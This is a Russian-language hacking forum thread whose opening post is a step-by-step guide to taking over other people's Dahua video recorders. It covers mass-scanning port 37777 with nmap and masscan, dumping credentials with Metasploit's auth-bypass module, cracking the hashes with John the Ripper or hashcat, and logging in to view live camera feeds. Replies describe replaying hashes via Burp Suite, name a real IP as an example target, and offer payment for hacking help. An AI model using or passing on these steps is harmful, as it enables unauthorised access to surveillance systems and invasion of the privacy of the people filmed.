HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.05.2018, 20:31
Kevin Shindel
Guest
Сообщений: n/a
Провел на форуме:
350242

Репутация: 62
По умолчанию

Приветствую обиталей Ачата.

Давно я не писал годноты.... почитал форум и понял что нужно что то толковое двинуть.

Сегодня я вам поведаю как подчинить под свой контроль регистраторы фирмы DAHUA.

Для начала нам нужны след. иснтрументы.

+ nmap

+ metasploit

+ john the ripper

+ Dahua SmartPSS (скачать можно с офф.сайта)

Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80.

80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81)

37777 порт для проприетарного софта.

Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080)

Итак запускаем nmap\masscan для поиска.

команда для нмапа следующая:

root@kali:nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt


если у вас есть список ИПов в стандарте CIRD

если по религиозным убеждениям используете масскан тогда печатайте так...

root@kali:masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt

можно сканировать из внешнего файла

root@kali: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt

для масскана аналогично

root@kali: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt

После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух.

root@kali:cat 37777.txt | sort | uniq > 37777_clear.txt

Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт.

root@kali:service postgresql start

root@kali:msfconsole

root@kali: use auxiliary/scanner/misc/dahua_dvr_auth_bypass


дальше сканер нужно настроить....

root@kali: set ACTION USER

root@kali: set THREADS 25


теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку

root@kali: set RHOSTS file:37777_clear.txt

ждём....

После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл.

Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" )

(Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

root@kali:hashcat -m 0 -a 0 hash.txt -o cracked.txt /home/wordlist.txt

Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки.

допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону.

root@kali: john hash.txt

Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все)

После удачного брута проверяем пароли...

root@kali: john hash.txt --show

После того как мы подобрали пасс можно поступить двумя способами...

Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ...

Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS.

сцыль "http://ru.dahuasecurity.com/ru/download_2.html"

я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225 "

Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности)

Ставим галку сохранить пароль и больше он запрашивается не будет.





Далее идём во вкладку HOME PAGE -> DEVICES



Жмём ADD, и указываем необходимые данные и жмём еще раз ADD.



Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа...



Бонусом запилил видосик на скорую руку...

https://yadi.sk/i/9E8pg8Iq3VPM6T
 
Ответить с цитированием

  #2  
Старый 26.07.2019, 09:22
Dimon_blin
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Цитата:
Сообщение от shinZa  
shinZa said:

(Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

Там вот такое шифрование:

Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074

Random value to encrypt with: 1958557123

Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074

MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E

p.s. 14/02/2019: там соленый md5 хеш по маске брутится, для маски надо логин и серийнк камеры


Если пароль не сложный! А если сложный, то не надо брутить, логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3


ДД, можно поконкретнее про "логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3". Если не затруднит, напишите плиз, как это делается по порядку. (Kali Linux). Можно в личку.
 
Ответить с цитированием

  #3  
Старый 26.07.2019, 09:29
Dimon_blin
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Было бы здорово, если бы подсказали какие-нибудь онлайн-сервисы по расшифровки паролей к камерам дахуа вида $dahua$y11Ko7d0. На компе с кали уже 3 неделю john брутит около 100 паролей и около 70 - без результата.
 
Ответить с цитированием

  #4  
Старый 26.07.2019, 14:28
shinZa
Guest
Сообщений: n/a
Провел на форуме:
8868

Репутация: 0
По умолчанию

Цитата:
Сообщение от Dimon_blin  
Dimon_blin said:

ДД, можно поконкретнее про "логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3". Если не затруднит, напишите плиз, как это делается по порядку. (Kali Linux). Можно в личку.
веб-морда дахуа отправляет зарос пароля хешом его в burpsuite и подменяешь.
 
Ответить с цитированием

  #5  
Старый 26.07.2019, 14:50
Dimon_blin
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Можно по действиям про burpsuite(если со скриншотами - вообще бы круто было иили коротенькое видео)? На примере 69.138.119.231. Запустил burpsuite, дальше куда что?



Может глупый вопрос, но в инете про такую реализацию инфы не нашел.
 
Ответить с цитированием

  #6  
Старый 26.07.2019, 20:33
shinZa
Guest
Сообщений: n/a
Провел на форуме:
8868

Репутация: 0
По умолчанию

Цитата:
Сообщение от Dimon_blin  
Dimon_blin said:

Можно по действиям про burpsuite(если со скриншотами - вообще бы круто было иили коротенькое видео)? На примере
69.138.119.231
. Запустил burpsuite, дальше куда что? Может глупый вопрос, но в инете про такую реализацию инфы не нашел.
здесь инфа https://blog.csdn.net/nixawk/article/details/62892129
 
Ответить с цитированием

  #7  
Старый 30.07.2019, 09:21
Dimon_blin
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Благодарю за ссылочку, но там очень коротко и не совсем понятен сам процесс(особенно через переводчик). Поэтому прошу описать процесс по шагам с фото или краткий видео-ролик(как для чайника), чтобы иметь понимание того, что делаешь и почему.
 
Ответить с цитированием

  #8  
Старый 31.07.2019, 11:22
shinZa
Guest
Сообщений: n/a
Провел на форуме:
8868

Репутация: 0
По умолчанию

Это ты отсюда пришел ???
 
Ответить с цитированием

  #9  
Старый 31.07.2019, 11:29
Dimon_blin
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Нет, читал статью, увидел коммент с поправкой про мд5, решил спросить.
 
Ответить с цитированием

  #10  
Старый 19.01.2020, 00:08
JustGo13
Guest
Сообщений: n/a
Провел на форуме:
4252

Репутация: 0
По умолчанию

ребят кто может вытащит хеш файл с конкретного двр к которому имеется доступ только через вай фай напишите заплачу за обучение
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ